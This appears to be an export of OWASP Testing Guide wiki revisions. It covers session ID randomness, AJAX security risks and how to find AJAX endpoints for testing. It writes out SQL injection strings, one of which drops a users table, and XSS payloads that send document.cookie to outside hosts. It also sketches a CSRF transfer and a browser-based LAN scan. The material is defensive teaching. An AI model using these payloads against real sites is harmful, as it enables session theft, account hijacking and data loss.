* What easily decoded proprietary information is stored?	&lt;br /&gt;
* What information can be deduced from the structure of the Session ID?	&lt;br /&gt;
* What portions of the Session ID are static for the same login conditions?	&lt;br /&gt;
* What obvious patterns are present in the Session ID as a whole, or individual portions?	&lt;br /&gt;
 &lt;br /&gt;
'''Session ID Predictability and Randomness'''&amp;lt;br&amp;gt;&lt;br /&gt;
Analysis of the variable areas (if any) of the Session ID should be undertaken to establish the existence of any recognizable or predictable patterns.&lt;br /&gt;
These analyses may be performed manually, or with bespoke or OTS statistical or cryptanalytic tools, in order to deduce any patterns in the Session ID content.&lt;br /&gt;
Manual checks should include comparisons of Session IDs issued for the same login conditions – e.g. the same username, password and IP address.  Time is an important factor which must also be controlled.  High numbers of simultaneous connections should be made in order to gather samples in the same time window and keep that variable constant.  Even a quantization of 50ms or less may be too coarse and a sample taken in this way may reveal time-based components that would otherwise be missed.&lt;br /&gt;
Variable elements should be analysed over time to determine whether they are incremental in nature.  Where they are incremental, patterns relating to absolute or elapsed time should be investigated.  Many systems use time as a seed for their pseudo random elements.&lt;br /&gt;
Where the patterns are seemingly random, one-way hashes of time or other environmental variations should be considered as a possibility.  Typically, the result of a cryptographic hash is a decimal or hexadecimal number so should be identifiable.&lt;br /&gt;
In analysing Session IDs sequences, patterns or cycles, static elements and client dependencies should all be considered as possible contributing elements to the structure and function of the application.&lt;br /&gt;
* Are the Session IDs provably random in nature?  e.g. Can the result be reproduced?  &lt;br /&gt;
* Do the same input conditions produce the same ID on a subsequent run?	&lt;br /&gt;
* Are the Session IDs provably resistant to statistical or cryptanalysis?	&lt;br /&gt;
* What elements of the Session IDs are time-linked?	&lt;br /&gt;
* What portions of the Session IDs are predictable?  	&lt;br /&gt;
* Can the next ID be deduced even given full knowledge of the generation algorithm and previous IDs?	&lt;br /&gt;
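One automatable check behind these questions is a simple entropy estimate over a token sample, in the spirit of tools like ENT. Note that low entropy proves weakness, but high entropy does not prove cryptographic strength. A sketch:

```python
import math
from collections import Counter

def entropy_bits_per_char(sample):
    # Shannon entropy of the character distribution, in bits per character.
    # A constant sample scores 0; a uniform spread over N symbols scores log2(N).
    counts = Counter(sample)
    n = len(sample)
    return -sum((c / n) * math.log2(c / n) for c in counts.values())
```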
&lt;br /&gt;
'''Brute Force Attacks'''&amp;lt;br&amp;gt;&lt;br /&gt;
Brute force attacks inevitably lead on from questions relating to predictability and randomness.&lt;br /&gt;
The variance within the Session IDs must be considered together with application session durations and timeouts.  If the variation within the Session IDs is relatively small, and Session ID validity is long, the likelihood of a successful brute-force attack is much higher.&lt;br /&gt;
A long session ID (or rather one with a great deal of variance) and a shorter validity period would make it far harder to succeed in a brute force attack.&lt;br /&gt;
* How long would a brute-force attack on all possible Session IDs take?	&lt;br /&gt;
* Is the Session ID space large enough to prevent brute forcing? e.g. is the length of the key sufficient when compared to the valid life-span	&lt;br /&gt;
* Do delays between connection attempts with different Session IDs mitigate the risk of this attack?&lt;br /&gt;
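These questions reduce to a back-of-the-envelope calculation: on average an attacker searches half the keyspace before hitting a valid ID. A sketch (the guess rate and character counts are illustrative):

```python
def expected_brute_force_seconds(charset_size, variable_chars, guesses_per_sec):
    # Expected time to guess one valid Session ID: half the keyspace
    # divided by the sustained guess rate.
    keyspace = charset_size ** variable_chars
    return keyspace / (2 * guesses_per_sec)

# e.g. only 4 hexadecimal characters actually vary, at 1000 guesses/second:
t = expected_brute_force_seconds(16, 4, 1000)
```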
&lt;br /&gt;
== Gray Box testing and example == &lt;br /&gt;
If you have access to the session management schema implementation, you can check for the following:&lt;br /&gt;
* Random Session Token&lt;br /&gt;
It is important that the SessionID or Cookie issued to the client is not easily predictable (don't use linear algorithms based on predictable variables such as the date or the client IP address). The use of cryptographic algorithms such as AES with a minimum key length of 256 bits is strongly encouraged.&lt;br /&gt;
* Token length&lt;br /&gt;
The SessionID should be at least 50 characters in length.&lt;br /&gt;
* Session Time-out&lt;br /&gt;
The session token should have a defined time-out (depending on the criticality of the data managed by the application)&lt;br /&gt;
* Cookie configuration&lt;br /&gt;
** non-persistent: only RAM memory&lt;br /&gt;
** secure (sent only over an HTTPS channel):  Set-Cookie: cookie=data; path=/; domain=.aaa.it; secure&lt;br /&gt;
** HttpOnly (not readable by a script):  Set-Cookie: cookie=data; path=/; domain=.aaa.it; HttpOnly&lt;br /&gt;
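The checklist above can be combined in one sketch: a CSPRNG-generated token comfortably over 50 characters, delivered with the secure and HttpOnly flags (the domain is the example one used above):

```python
import secrets

def session_set_cookie(domain=".aaa.it"):
    # 32 bytes from the OS CSPRNG -> 64 hex characters (256 bits of
    # entropy), well over the 50-character minimum suggested above.
    token = secrets.token_hex(32)
    return ("Set-Cookie: cookie={}; path=/; domain={}; "
            "secure; HttpOnly".format(token, domain))
```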
&lt;br /&gt;
== References ==&lt;br /&gt;
'''Whitepapers'''&amp;lt;br&amp;gt;&lt;br /&gt;
* Gunter Ollmann: &amp;quot;Web Based Session Management&amp;quot; - http://www.technicalinfo.net&lt;br /&gt;
* RFCs 2109 &amp;amp; 2965: &amp;quot;HTTP State Management Mechanism&amp;quot; - http://www.ietf.org/rfc/rfc2965.txt, http://www.ietf.org/rfc/rfc2109.txt&lt;br /&gt;
* RFC 2616: &amp;quot;Hypertext Transfer Protocol -- HTTP/1.1&amp;quot; - http://www.ietf.org/rfc/rfc2616.txt&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
{{Category:OWASP Testing Project AoC}}&lt;/div&gt;</summary>
		<author><name>Katie.mcdowell</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Testing_for_AJAX_Vulnerabilities_(OWASP-AJ-001)&amp;diff=13711</id>
		<title>Testing for AJAX Vulnerabilities (OWASP-AJ-001)</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Testing_for_AJAX_Vulnerabilities_(OWASP-AJ-001)&amp;diff=13711"/>
				<updated>2006-11-27T02:44:22Z</updated>
		
		<summary type="html">&lt;p&gt;Katie.mcdowell: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]]&amp;lt;br&amp;gt;&lt;br /&gt;
{{Template:OWASP Testing Guide v2}}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Introduction ==&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
'''Asynchronous JavaScript and XML (AJAX)''' is one of the latest techniques used by web application developers to provide a user experience similar to that of a local application. Since AJAX is still a relatively new term, little thought has been given to its security implications. The security issues in AJAX include:&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
* A larger attack surface with many more inputs to secure&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Exposed internal functions of the Web application server&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Allows a client-side script to access third-party resources with no built-in security and encoding mechanisms&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Login Information and Intrusion Detection&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Attacks and Vulnerabilities == &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
'''XMLHttpRequest Vulnerabilities'''&amp;lt;br&amp;gt; AJAX uses the XMLHttpRequest(XHR) object for all the back-end work. A client sends a request to a specific URL on the same server as the original page and can receive any kind of reply from the server. These replies are often snippets of HTML, but can also be XML, Javascript Object Notation (JSON), image data, or anything else that Javascript can process.&amp;lt;p&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Secondly, when an AJAX page is accessed over a non-SSL connection, the subsequent XMLHttpRequest calls are also not SSL encrypted. Hence, the login data traverses the wire in clear text. Using the secure HTTPS/SSL channels which modern browsers support is the easiest way to prevent such attacks.&amp;lt;/p&amp;gt;&lt;br /&gt;
&lt;br /&gt;
XMLHttpRequest (XHR) objects can retrieve information from any server on the web. This could lead to various other attacks such as SQL Injection, Cross Site Scripting (XSS), etc.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;p&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Increased Attack Surface''' &amp;lt;br&amp;gt;&lt;br /&gt;
Unlike traditional web applications that reside completely on the server, AJAX applications extend across the client and the server, which gives the client some power. This introduces additional ways to potentially inject malicious content.&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''SQL Injection'''&amp;lt;br&amp;gt;SQL Injection attacks are remote attacks on the database in which the attacker modifies the data in the database. &amp;lt;br&amp;gt; A typical SQL Injection attack could be as follows:&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
*'''''Example 1'''''&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
SELECT id FROM users WHERE name='' OR 1=1 AND pass='' OR 1=1 LIMIT 1;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
This query will always return one row (unless the table is empty), and it is likely to be the first entry in the table. For many applications, that entry is the administrative login - the one with the most privileges.&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
*'''''Example 2'''''&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
SELECT id FROM users WHERE name='' AND pass=''; DROP TABLE users;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
The above query drops the users table, destroying its data.&amp;lt;br&amp;gt;&lt;br /&gt;
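Both examples rely on the server assembling the SQL string from raw input. The vulnerable pattern, illustrated in Python (table and column names follow the queries above):

```python
def build_login_query(name, password):
    # VULNERABLE: raw string concatenation -- exactly the pattern
    # that the two example payloads exploit.
    return ("SELECT id FROM users WHERE name='" + name +
            "' AND pass='" + password + "';")

# A crafted username turns the WHERE clause into a tautology:
query = build_login_query("' OR 1=1 LIMIT 1;--", "anything")
```

Parameterized queries (prepared statements) avoid the problem by keeping user data out of the SQL text entirely.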
&lt;br /&gt;
More on SQL Injection can be found at [http://www.owasp.org/index.php/SQL_Injection_AoC SQL Injection (OWASP Testing Guide v2)].&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Cross Site Scripting'''&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Cross Site Scripting is a technique by which malicious content is injected in the form of HTML links, JavaScript alerts, or error messages. XSS exploits can be used to trigger various other attacks like cookie theft, account hijacking, and denial of service. &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Browser and AJAX requests look identical, so the server is not able to classify them. Consequently, it won't be able to discern who made the request in the background. A JavaScript program can use AJAX to request a resource in the background without the user's knowledge. The browser will automatically add the necessary authentication or state-keeping information, such as cookies, to the request. JavaScript code can then access the response to this hidden request and send more requests. This expansion of JavaScript functionality increases the possible damage of a Cross-Site Scripting (XSS) attack.&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Also, an XSS attack could send requests for specific pages other than the page the user is currently looking at. This allows the attacker to actively look for certain content, potentially accessing the data.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
The XSS payload can use AJAX requests to autonomously inject itself into pages and easily re-inject the same host with more XSS (like a virus), all of which can be done with no hard refresh. Thus, XSS can send multiple requests using complex HTTP methods to propagate itself invisibly to the user. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
*'''''Example''''' &lt;br /&gt;
&amp;lt;pre&amp;gt;&amp;lt;script&amp;gt;alert(&amp;quot;howdy&amp;quot;)&amp;lt;/script&amp;gt;&lt;br /&gt;
&amp;lt;script&amp;gt;document.location='http://www.example.com/pag.pl?'%20+document.cookie&amp;lt;/script&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
''Usage:''&lt;br /&gt;
&amp;lt;pre&amp;gt;http://example.com/login.php?variable=&amp;quot;&amp;gt;&amp;lt;script&amp;gt;document.location='http://www.irr.com/cont.php?'+document.cookie&amp;lt;/script&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
This will simply redirect the page to an unknown, malicious page after logging into the original page from which the request was made.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Client Side Injection Threats'''&amp;lt;br&amp;gt;&lt;br /&gt;
* ''XSS exploits'' can give access to any client-side data, and can also modify the client-side code.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
* ''DOM Injection'' is a type of XSS injection which happens through the sub-objects document.location, document.URL, or document.referrer of the Document Object Model (DOM)&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&amp;lt;SCRIPT&amp;gt;&lt;br /&gt;
var pos=document.URL.indexOf(&amp;quot;name=&amp;quot;)+5;&lt;br /&gt;
document.write(document.URL.substring(pos,document.URL.length));&lt;br /&gt;
&amp;lt;/SCRIPT&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
* ''JSON/XML/XSLT Injection'' - Injection of malicious code in the XML content.&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''AJAX Bridging'''&amp;lt;br&amp;gt;&lt;br /&gt;
For security purposes, AJAX applications can only connect back to the website from which they come. For example, JavaScript with AJAX downloaded from yahoo.com cannot make connections to google.com. To allow AJAX to contact third-party sites in this manner, the AJAX service bridge was created. In a bridge, a host provides a web service that acts as a proxy to forward traffic between the JavaScript running on the client and the third-party site. A bridge could be considered a 'web service to web service' connection. An attacker could use this to access sites with restricted access.&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Cross Site Request Forgery (CSRF)'''&amp;lt;br&amp;gt;&lt;br /&gt;
CSRF is an exploit where an attacker forces a victim’s web browser to send an HTTP request to any website of the attacker's choosing (the intranet is fair game as well). For example, while reading this post, HTML/JavaScript code embedded in the web page could force your browser to make an off-domain request to your bank, blog, web mail, DSL router, etc. Invisibly, CSRF could transfer funds, post comments, compromise email lists, or reconfigure the network. When a victim is forced to make a CSRF request, it will be authenticated if they have recently logged in. The worst part is that all system logs would verify that the victim did in fact make the request. This attack, though not common, has been done before. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
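The forged request described above can be sketched in a few lines of JavaScript. The bank URL and parameter names here are hypothetical illustrations, not taken from any real attack:

```javascript
// Hedged sketch: how a CSRF payload forges a state-changing request URL.
// 'bank.example', 'to', and 'amount' are invented example names.
function buildCsrfUrl(baseUrl, params) {
  // Serialize params into a query string; '\u0026' is the ampersand separator.
  const query = Object.keys(params)
    .map((k) => encodeURIComponent(k) + '=' + encodeURIComponent(params[k]))
    .join('\u0026');
  return baseUrl + '?' + query;
}

const forged = buildCsrfUrl('http://bank.example/transfer', {
  to: 'attacker',
  amount: '1000'
});
// In a real attack this URL would be planted in an invisible image, e.g.
// new Image().src = forged; -- the victim's browser then sends the request
// with the victim's session cookie attached automatically.
```

Because the browser attaches cookies to every request for the target domain, the forged request is indistinguishable from a legitimate one in the server's logs.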
&lt;br /&gt;
'''Denial of Service'''&amp;lt;br&amp;gt;Denial of Service is an old attack in which an attacker or a vulnerable application forces the user's browser to launch multiple XMLHttpRequests against a target application, against the user's wishes. In fact, browser domain restrictions make XMLHttpRequests useless for launching such attacks on other domains. Simple tricks, such as using image tags nested within a JavaScript loop, can do the job more effectively. AJAX, being on the client side, makes the attack easier.&amp;lt;pre&amp;gt;&amp;lt;IMG SRC=&amp;quot;http://example.com/cgi-bin/ouch.cgi?a=b&amp;quot;&amp;gt;&amp;lt;/pre&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''Browser Based Attacks'''&amp;lt;br&amp;gt;&lt;br /&gt;
The web browsers we use have not been designed with security in mind. Most of the security features available in browsers respond to previously known attacks, so our browsers are not prepared for newer attacks.&amp;lt;br&amp;gt;&lt;br /&gt;
There have been a number of new attacks on browsers, such as using the browser to hack into the internal network. The JavaScript first determines the internal network address of the PC. Then, using standard JavaScript objects and commands, it starts scanning the local network for Web servers. These could be computers that serve Web pages, but they could also include routers, printers, IP phones, and other networked devices or applications that have a Web interface. The JavaScript scanner determines whether there is a computer at an IP address by sending a &amp;quot;ping&amp;quot; using JavaScript &amp;quot;image&amp;quot; objects. It then determines which servers are running by looking for image files stored in standard places and analyzing the traffic and error messages it receives back. &lt;br /&gt;
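The scanning step described above can be sketched as follows. The subnet prefix and image path are assumptions for illustration; the browser-only Image probing is shown in comments so the sketch stays self-contained:

```javascript
// Hedged sketch of the JavaScript "image ping" scan described above.
// '192.168.0.' and '/favicon.ico' are illustrative guesses, not a real tool.
function probeUrls(prefix, start, count) {
  // Build candidate web-server addresses on the local subnet.
  return Array.from({ length: count }, (_, i) =>
    prefix + (start + i) + '/favicon.ico'
  );
}

const targets = probeUrls('http://192.168.0.', 1, 4);
// Browser-side, each URL would be assigned to a new Image().src; whether
// (and how quickly) the onload / onerror handler fires hints at whether a
// host answered, all without any same-origin restriction applying.
```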
&lt;br /&gt;
&amp;lt;p&amp;gt;Attacks that target Web browser and Web application vulnerabilities are often conducted over HTTP and, therefore, may bypass filtering mechanisms in place on the network perimeter. In addition, the widespread deployment of Web applications and Web browsers gives attackers a large number of easily exploitable targets. For example, Web browser vulnerabilities can lead to the exploitation of vulnerabilities in operating system components and individual applications, which can lead to the installation of malicious code, including bots.&amp;lt;/p&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Major Attacks  ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''MySpace Attack'''&amp;lt;br&amp;gt;The Samy and Spaceflash worms both spread on MySpace, changing profiles on the hugely popular social-networking Web site. In the ''Samy attack'', an XSS exploit allowed &amp;lt;SCRIPT&amp;gt; tags in MySpace.com profiles. AJAX was used to inject a virus into the MySpace profile of any user viewing an infected page, forcing that user to add the user “Samy” to their friends list. It also appended the words “Samy is my hero” to the victim's profile.&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Yahoo! Mail Attack'''&amp;lt;br&amp;gt;In June 2006, the Yamanner worm infected Yahoo's mail service. The worm, using XSS and AJAX, took advantage of a vulnerability in Yahoo Mail's onload event handling. When an infected email was opened, the worm code executed its JavaScript, sending a copy of itself to all the Yahoo contacts of the infected user. The infected email carried a spoofed 'From' address picked randomly from the infected system, which made it look like an email from a known user.&lt;br /&gt;
&lt;br /&gt;
== Testing == &lt;br /&gt;
The '''OWASP Testing Guide sections on AJAX Testing''' provide information on various aspects of AJAX testing. &amp;lt;br&amp;gt;&lt;br /&gt;
[[AJAX_Testing_AoC | 4.9 AJAX Testing ]]&amp;lt;br&amp;gt;&lt;br /&gt;
[[AJAX_How_to_test_AoC | 4.9.2 How to Test AJAX]]&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Testing Tools ==&lt;br /&gt;
&lt;br /&gt;
Here are some '''AJAX Testing Tools''':&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''Venkman''' &amp;lt;br&amp;gt; [http://www.mozilla.org/projects/venkman/ Venkman] is the code name for Mozilla's JavaScript Debugger. Venkman aims to provide a powerful JavaScript debugging environment for Mozilla-based browsers. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''Ghost Train'''&amp;lt;br&amp;gt;[http://wiki.script.aculo.us/scriptaculous/show/GhostTrain Scriptaculous's Ghost Train] is a tool to ease the development of functional tests for web sites. It’s an event recorder, and a test-generating and replaying add-on you can use with any web application.&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''Squish/Web (froglogic)'''&amp;lt;br&amp;gt;&lt;br /&gt;
[http://www.froglogic.com/squish Squish] is an automated, functional testing tool. It allows you to record, edit, and run web tests in different browsers (IE, Firefox, Safari, Konqueror, etc.) on different platforms without having to modify the test scripts. It supports different scripting languages for tests.&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''JsUnit'''&amp;lt;br&amp;gt;[http://www.edwardh.com/jsunit/ JsUnit] is a Unit Testing framework for client-side (in-browser) JavaScript. It is essentially a port of JUnit to JavaScript.&lt;br /&gt;
&lt;br /&gt;
== References == &lt;br /&gt;
&lt;br /&gt;
*[http://en.wikipedia.org/wiki/AJAX AJAX]&amp;lt;br&amp;gt;&lt;br /&gt;
*[http://ajaxpatterns.org AJAX Patterns] &lt;br /&gt;
&lt;br /&gt;
;'''Whitepapers'''&amp;lt;br&amp;gt;&lt;br /&gt;
*[http://www.blackhat.com/presentations/bh-usa-06/BH-US-06-Hoffman.pdf Billy Hoffman, &amp;quot;Ajax(in) Security&amp;quot;, SPI Labs]&amp;lt;br&amp;gt;&lt;br /&gt;
*[http://www.blackhat.com/presentations/bh-usa-06/BH-US-06-Hoffman_web.pdf Billy Hoffman, &amp;quot;Analysis of Web Application Worms and Viruses&amp;quot;, SPI Labs]&amp;lt;br&amp;gt;&lt;br /&gt;
*[http://www.spidynamics.com/assets/documents/AJAXdangers.pdf Billy Hoffman, &amp;quot;Ajax Security Dangers&amp;quot;, SPI Labs]&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
;'''Articles'''&amp;lt;br&amp;gt;&lt;br /&gt;
*[http://www.adaptivepath.com/publications/essays/archives/000385.php Jesse James Garrett. “Ajax: A New Approach to Web Applications”, Adaptive Path]&amp;lt;br&amp;gt;&lt;br /&gt;
*[http://www.webappsec.org/projects/articles/071105.html Amit Klein. &amp;quot;DOM Based Cross Site Scripting or XSS of the Third Kind: A look at an overlooked flavor of XSS&amp;quot;, Web Application Security Consortium]&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
{{Category:OWASP Testing Project AoC}}&lt;/div&gt;</summary>
		<author><name>Katie.mcdowell</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Testing_for_AJAX:_introduction&amp;diff=13710</id>
		<title>Testing for AJAX: introduction</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Testing_for_AJAX:_introduction&amp;diff=13710"/>
				<updated>2006-11-27T02:18:34Z</updated>
		
		<summary type="html">&lt;p&gt;Katie.mcdowell: /* 4.9 AJAX Testing */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]]&amp;lt;br&amp;gt;&lt;br /&gt;
{{Template:OWASP Testing Guide v2}}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== 4.9 AJAX Testing ===&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
AJAX, an acronym for Asynchronous JavaScript and XML, is a web development technique used to create more responsive web applications.  It uses a combination of technologies in order to provide an experience that is more like using a desktop application.  This is accomplished by using the XMLHttpRequest object and JavaScript to make asynchronous requests to the web server, parsing the responses and then updating the page DOM HTML and CSS.&lt;br /&gt;
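A minimal sketch of the request pattern just described, assuming a hypothetical '/data' endpoint; the browser-only XMLHttpRequest calls are shown as comments so the sketch stays self-contained:

```javascript
// Helper mapping the numeric readyState codes an asynchronous request
// moves through to their conventional names.
function describeReadyState(state) {
  const names = ['UNSENT', 'OPENED', 'HEADERS_RECEIVED', 'LOADING', 'DONE'];
  return names[state];
}

// Browser-side usage (commented: XMLHttpRequest only exists in browsers):
// const xhr = new XMLHttpRequest();
// xhr.open('GET', '/data', true);            // true = asynchronous
// xhr.onreadystatechange = function () {
//   if (xhr.readyState === 4) {              // 4 = DONE
//     // Parse the response, then update the page DOM, e.g.:
//     document.getElementById('out').innerHTML = xhr.responseText;
//   }
// };
// xhr.send(null);
```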
&lt;br /&gt;
Utilizing AJAX techniques can have tremendous usability benefits for web applications.  From a security standpoint, however, AJAX applications have a greater attack surface than normal web applications, and they are often developed with a focus on what can be done rather than what should be done.  Also, AJAX applications are more complicated because processing is done on both the client side and the server side.  The use of frameworks to hide this complexity can help to reduce development headaches, but can also result in situations where developers do not fully understand where the code they are writing will execute.  This can lead to situations where it is difficult to properly assess the risk associated with particular applications or features.&lt;br /&gt;
&lt;br /&gt;
AJAX applications are vulnerable to the full range of traditional web application vulnerabilities.  Insecure coding practices can lead to SQL injection vulnerabilities, misplaced trust in user-supplied input can lead to parameter tampering vulnerabilities, and a failure to require proper authentication and authorization can lead to problems with confidentiality and integrity.  In addition, AJAX applications can be vulnerable to new classes of attack such as Cross Site Request Forgery (XSRF).&lt;br /&gt;
&lt;br /&gt;
Testing AJAX applications can be challenging because developers are given a tremendous amount of freedom in how they communicate between the client and the server.  In traditional web applications, standard HTML forms submitted via GET or POST requests have an easy-to-understand format, and it is therefore easy to modify or create new well-formed requests.  AJAX applications often use different encoding or serialization schemes to submit POST data making it difficult for testing tools to reliably create automated test requests.  The use of web proxy tools is extremely valuable for observing behind-the-scenes asynchronous traffic and for ultimately modifying this traffic to properly test the AJAX-enabled application.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
In this section we describe the following:&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[AJAX Vulnerabilities AoC |4.9.1 AJAX Vulnerabilities ]]&amp;lt;br&amp;gt;&lt;br /&gt;
[[AJAX How to test AoC|4.9.2 How to test AJAX ]]&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
{{Category:OWASP Testing Project AoC}}&lt;/div&gt;</summary>
		<author><name>Katie.mcdowell</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=AJAX_How_to_test_AoC&amp;diff=13709</id>
		<title>AJAX How to test AoC</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=AJAX_How_to_test_AoC&amp;diff=13709"/>
				<updated>2006-11-27T02:13:08Z</updated>
		
		<summary type="html">&lt;p&gt;Katie.mcdowell: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]]&amp;lt;br&amp;gt;&lt;br /&gt;
{{Template:OWASP Testing Guide v2}}&lt;br /&gt;
&lt;br /&gt;
== Brief Summary ==&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Because most attacks against AJAX applications are analogs of attacks against traditional web applications, testers should refer to other sections of the testing guide to look for specific parameter manipulations to use in order to discover vulnerabilities.  The challenge with AJAX-enabled applications is often finding the endpoints that are the targets for the asynchronous calls and then determining the proper format for requests.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Description of the Issue == &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Traditional web applications are fairly easy to discover in an automated fashion.  An application typically has one or more pages that are connected by HREFs or other links.  Interesting pages will have one or more HTML FORMs.  These forms will have one or more parameters.  By using simple spidering techniques, such as looking for anchor (A) tags and HTML FORMs, it should be possible to discover all pages, forms, and parameters in a traditional web application.  Requests made to this application follow a well-known and consistent format laid out in the HTTP specification.  GET requests have the format:&lt;br /&gt;
&lt;br /&gt;
http://server.com/directory/resource.cgi?param1=value1&amp;amp;key=value&lt;br /&gt;
&lt;br /&gt;
POST requests are sent to URLs in a similar fashion:&lt;br /&gt;
&lt;br /&gt;
http://server.com/directory/resource.cgi&lt;br /&gt;
&lt;br /&gt;
Data sent with POST requests is encoded in a similar format and included in the request body after the headers:&lt;br /&gt;
&lt;br /&gt;
param1=value1&amp;amp;key=value&lt;br /&gt;
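As a sketch, the form-encoded body above can be decoded back into name/value pairs like this; a tester often does exactly this when inspecting captured traffic:

```javascript
// Decode a form-encoded request body (name=value pairs joined by
// ampersands) into an object. '\u0026' is the ampersand character.
function parseFormBody(body) {
  const result = {};
  body.split('\u0026').forEach((pair) => {
    const idx = pair.indexOf('=');
    const name = decodeURIComponent(pair.slice(0, idx));
    result[name] = decodeURIComponent(pair.slice(idx + 1));
  });
  return result;
}

// Decode the example body from the text above.
const decoded = parseFormBody('param1=value1' + '\u0026' + 'key=value');
```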
&lt;br /&gt;
Unfortunately, server-side AJAX endpoints are not as easy or consistent to discover, and the format of actual valid requests is left to the AJAX framework in use or the discretion of the developer.  Therefore, to fully test AJAX-enabled applications, testers need to be aware of the frameworks in use, the AJAX endpoints that are available, and the required format for requests to be considered valid.  Once this understanding has been developed, standard parameter manipulation techniques using a proxy can be used to test for SQL injection and other flaws.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Black Box testing and example ==&lt;br /&gt;
'''Testing for AJAX Endpoints:''' &amp;lt;br&amp;gt;&lt;br /&gt;
Before an AJAX-enabled web application can be tested, the call endpoints for the asynchronous calls must be enumerated.  See [[Application_Discovery_AoC]] for more information about how traditional web applications are discovered.  For AJAX applications, there are two main approaches to determining call endpoints: parsing the HTML and JavaScript files and using a proxy to observe traffic.&lt;br /&gt;
&lt;br /&gt;
The advantage of parsing the HTML and JavaScript files in a web application is that it can provide a more comprehensive view of the server-side capabilities that can be accessed from the client side.  The drawback is that manually reviewing HTML and JavaScript content is tedious and, more importantly, the location and format of server-side URLs available to be accessed by AJAX calls are framework dependent.&lt;br /&gt;
&lt;br /&gt;
